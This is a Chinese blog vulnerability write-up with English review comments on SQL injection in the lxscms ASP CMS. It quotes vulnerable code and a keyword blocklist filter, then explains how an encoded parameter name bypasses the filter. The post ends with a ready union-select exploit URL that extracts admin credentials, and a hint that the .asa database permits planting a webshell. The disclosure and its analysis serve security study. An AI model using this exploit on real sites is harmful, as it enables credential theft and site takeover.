作者:Samy      出处:http://hi.baidu.com/0x7362/blog

' Page fragment (blog excerpt): loads one lxscms_i row by id, touches its hit counter
' and optionally redirects.  Several closing statements are missing from the excerpt.
' NOTE(review): idd is only declared here; the assignment that fills it (presumably
' Request("id"), per the discussion further down) is not part of this excerpt.
dim idd

' Empty id -> error box.  Whether the request actually stops here depends on the
' response.end path inside errbox (it is taken only when box1 <> "1").
if idd="" then
 call errbox("无效的参数传递","","","","")
 end if

' idd is spliced straight into the SQL text: this is the injection sink the post is
' about.  Typing the value (IsNumeric(idd) then CLng(idd)) or binding it through an
' ADODB.Command parameter closes it; the keyword blocklist below does not.
rs.open "select * from lxscms_i where shenhe=1 and id="&idd,conn,1,3
if rs.eof and rs.bof then
call errbox("您所查找的信息不存在","","","","")
' NOTE(review): no "end if" for the rs.eof/rs.bof test survives in this excerpt.

' VBScript note: when hits is Null, rs("hits")=0 and rs("hits")="" both evaluate to
' Null and the branch is skipped.  The "else" arm (presumably the increment) is empty
' in the excerpt, so only the 0/"" -> 1 case is visible.
if rs("hits")=0 or rs("hits")="" then
rs("hits")=1
 else

end if
' Unconditional redirect to whatever URL is stored in the row; this is only as safe
' as the validation applied when uurl was written (not visible here).
if rs("uurl") <> "" then
response.Redirect ""& rs("uurl") &""
end if









' errbox(boxvalue, boxurl, box1, box2, box3): writes an error box (box1 = "1") or
' ends the response (any other box1).  box2 and box3 are never read in this excerpt.
' NOTE(review): the If/Else nesting below is not well-formed as pasted -- two blocks
' have no "end if" and one If carries two "else" arms -- so lines were lost; the
' comments describe only what the surviving statements show.
sub errbox(boxvalue,boxurl,box1,box2,box3)
' boxvalues: the message to display; "" when no message was given.
if boxvalue = "" then
boxvalues = ""
else
boxvalues = boxvalue

if box1 = "1" then

else

' boxurls: JavaScript for the "next step" link.  The condition selecting between the
' two assignments is missing; presumably it tested whether boxurl is empty.
boxurls = "history.go(-1);"
 else
 ' boxurl is interpolated into a JS string literal with no escaping.  Every caller in
 ' this excerpt passes "", but any user-controlled boxurl would alter the emitted script.
 boxurls = "window.location.href = '"& boxurl &"';"

end if
' Inline rendering: boxvalues goes into the HTML unencoded (no Server.HTMLEncode).
' Note the second anchor uses boxurls as a plain href; unlike the first anchor there
' is no "javascript:" prefix, so the browser would treat it as a relative URL.
 if box1 = "1" then
 response.write "<style>body {background:#fff;margin:auto;text-align:center;}.box1 {line-height:32px;font-size:14px;margin:60px;clear:both;}</style><div class='box1'>"& boxvalues &"<br /><a href='javascript:history.go(-1);'>后退至上一页</a> <a href='"& boxurls &"'>继续操作下一步</a></div>"

else

' Any other box1 value: no output in this excerpt, the response is just terminated.
response.end
end if
end sub
' Request-parameter keyword filter (the CMS's anti-injection check).  Missing from this
' excerpt: the loop that splits Fy_Url on "&" into Fy_a, the Select Case that the
' Case "1"/"2"/"3" arms belong to, and the matching "end if"/"Next" statements.
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Z'

' QUERY_STRING is the raw, still URL-encoded query string, whereas Request(name)
' resolves decoded parameter names.  Names are therefore parsed here in encoded form
' and looked up by that encoded spelling below -- the mismatch this post describes.
Fy_Url=LCase(Request.ServerVariables("QUERY_STRING"))

' Fy_a is not assigned anywhere in this excerpt (the split is among the lost lines).
redim Fy_Cs(ubound(Fy_a))
' From here on every runtime error (bad index, wrong argument count, ...) is
' swallowed; for a security check that turns a failure into a silent pass.
On Error Resume Next

' Parameter name = text before the "=" of each "name=value" pair.
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)


Next
' NOTE(review): id is unquoted here.  As written it is a variable (Empty unless set
' elsewhere), not the string "id"; quotes may have been lost in the paste.  Either way,
' values are fetched by the names taken from the encoded query string.
For Fy_x=0 to ubound(Fy_Cs)    Fy_cs(0) =id


  ' Substring blocklist over the decoded value.  Besides being bypassable, plain Instr
  ' also matches inside ordinary words ("and", "mid", "select" ...), so legitimate
  ' values are rejected; and "delete%20from" can never match a value that Request()
  ' has already decoded.  Typing the id or parameterizing the query is the real fix.
  If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then

' errbox is declared above with five parameters but called with four in these arms;
' under On Error Resume Next that call fails silently and no message is written,
' leaving Response.End as the only effect.
Case "1"
 call errbox("因为你的某些非法操作,系统已经锁定了你的IP","","","")
 Case "2"

Case "3"
call errbox("因为你的某些非法操作,系统已经锁定了你的IP","","","")

Response.End

程序根据参数 name 取出 value 来判断：If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0

如果我们只对 value 编码，最终仍会被解码，程序依然可以检测到。

绕过方法:

到这里 i%64 会被解码成 id（过滤用的参数名取自未解码的 QUERY_STRING，而 Request("id") 是按解码后的名字取值的）。

可我们只对 i%64 赋值，过滤时 id 的值就为空了。

Exp:

http://siteweb/infor.asp?i%64=-1 union select 1,qwbmuname,qwbmupwds,4,5,6+from+lxscms_u 

另外数据库asa格式 。可插马